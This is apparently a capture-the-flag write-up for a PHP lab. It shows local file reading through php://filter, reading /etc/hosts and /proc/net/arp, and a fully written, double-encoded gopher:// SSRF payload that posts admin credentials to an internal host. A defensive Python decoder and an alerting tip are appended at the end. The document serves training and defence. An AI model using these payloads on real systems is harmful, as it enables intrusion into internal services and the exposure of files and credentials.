Challenge description
You failed the course. Try breaking into the school intranet to change your grade ("my fate is in my own hands" series).
From this we can tell the challenge needs SSRF.
PHP wrappers
debug.php turns up in the page source.
In debug.php we find that PHP stream wrappers can be used.
Passing ?file=php://filter/convert.base64-encode/resource=debug.php
lets us read the source of debug.php:
<?php
// Denylist on the requested file name: blocks "../", "tp" (http/ftp),
// "input" and "data", but not php://filter, so that wrapper still works.
echo "<h1>快去学习PHP伪协议</h1>";
error_reporting(0);
$file = $_GET['file'];
if (strstr($file, "../") || stristr($file, "tp") || stristr($file, "input") || stristr($file, "data")) {
    echo "NO!!!";
    exit();
}
include($file);
?>
Passing ?file=php://filter/convert.base64-encode/resource=index.php
lets us read the source of index.php:
<?php
// The url parameter goes straight to curl with no scheme allowlist and no
// destination check, so gopher:// and internal hosts are both reachable.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
?>
From index.php we can draw a few conclusions:
1: name is admin, password is 123456, result is 60
2: the subnet is 172.17.0.0/24
Next, use the wrapper again to read the sensitive files /etc/hosts
and /proc/net/arp on the current host.
This yields a number of internal IPs; fuzzing them gives the one we actually need, 172.17.0.7.
SSRF
Now that we know the host and the other details, we can build the SSRF request, using the gopher protocol.
Construct the POST request:
http://106.55.154.252:8010/?url=gopher://172.17.0.7:80/_POST /index.php HTTP/1.1
Host: 172.17.0.7:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

name=admin&password=123456&result=60
URL-encode the spaces, colons and equals signs, and replace each line ending with %0d%0a:
http://106.55.154.252:8010/?url=gopher://172.17.0.7:80/_POST%20/index.php%20HTTP/1.1%0D%0AHost%3A%20172.17.0.7%3A80%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0AContent-Length%3A%2036%0D%0A%0D%0Aname%3Dadmin%26password%3D123456%26result%3D60%0D%0A
Second URL encoding: URL-encode every character after the underscore "_":
http://106.55.154.252:8010/?url=gopher://172.17.0.7:80/_%50%4f%53%54%25%32%30%2f%69%6e%64%65%78%2e%70%68%70%25%32%30%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41%48%6f%73%74%25%33%41%25%32%30%31%37%32%2e%31%37%2e%30%2e%37%25%33%41%38%30%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%54%79%70%65%25%33%41%25%32%30%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%25%33%41%25%32%30%33%36%25%30%44%25%30%41%25%30%44%25%30%41%6e%61%6d%65%25%33%44%61%64%6d%69%6e%25%32%36%70%61%73%73%77%6f%72%64%25%33%44%31%32%33%34%35%36%25%32%36%72%65%73%75%6c%74%25%33%44%36%30%25%30%44%25%30%41
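The two encoding layers above are exactly what an incident responder has to peel back when this payload shows up in the vulnerable host's access log. As an added example (not part of the original writeup), the following hypothetical Python helper reverses both layers, the web server's decode that produces $_GET['url'] and curl's own percent-decoding of the gopher selector, and reports the internal target and the smuggled request; the log entry it parses is constructed from the payload above.

```python
"""Reverse the two encoding layers of a gopher:// SSRF payload (hypothetical
defender-side helper): from the request URI in the vulnerable host's access
log, recover the internal target and the exact request curl sent for the attacker."""
import ipaddress
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed log entry: the request-URI field carrying the double-encoded
# payload from the writeup (the rest of the log line is not needed).
SAMPLE_LOG_URI = (
    "/?url=gopher://172.17.0.7:80/_"
    "%50%4f%53%54%25%32%30%2f%69%6e%64%65%78%2e%70%68%70%25%32%30"
    "%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41"
    "%48%6f%73%74%25%33%41%25%32%30%31%37%32%2e%31%37%2e%30%2e%37%25%33%41%38%30%25%30%44%25%30%41"
    "%43%6f%6e%74%65%6e%74%2d%54%79%70%65%25%33%41%25%32%30"
    "%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%44%25%30%41"
    "%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%25%33%41%25%32%30%33%36%25%30%44%25%30%41%25%30%44%25%30%41"
    "%6e%61%6d%65%25%33%44%61%64%6d%69%6e%25%32%36"
    "%70%61%73%73%77%6f%72%64%25%33%44%31%32%33%34%35%36%25%32%36"
    "%72%65%73%75%6c%74%25%33%44%36%30%25%30%44%25%30%41"
)


def decode_gopher_ssrf(request_uri: str) -> dict:
    """Return target, port, private-address flag, smuggled request line and
    POST body; raise ValueError if the url parameter is not gopher://."""
    # Layer 1: the web server percent-decodes the query string once. This is
    # the value PHP sees in $_GET['url'] and hands to CURLOPT_URL unchecked.
    gopher_url = parse_qs(urlsplit(request_uri).query)["url"][0]
    parts = urlsplit(gopher_url)
    if parts.scheme != "gopher":
        raise ValueError("not a gopher:// payload")
    # Layer 2: curl drops the leading "/" and the one-char gopher item type
    # ("_" here), percent-decodes the rest of the selector and writes those
    # raw bytes (plus CRLF) to host:port, so the decoded selector IS the request.
    raw_request = unquote(parts.path[2:])
    head, _, body = raw_request.partition("\r\n\r\n")
    host = parts.hostname or ""
    try:
        internal = ipaddress.ip_address(host).is_private
    except ValueError:
        internal = None  # hostname rather than literal IP: resolve before judging
    return {
        "target": host,
        "port": parts.port,
        "internal": internal,
        "request_line": head.split("\r\n")[0],
        "body": body.rstrip("\r\n"),
    }
```

Alerting on any decoded gopher:// target that falls in a private range, as this one does, catches the class of request regardless of how many encoding layers were stacked on it.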
Summary
1: Line breaks must be replaced with %0d%0a.
2: /etc/hosts and /proc/net/arp are sensitive files that expose network information.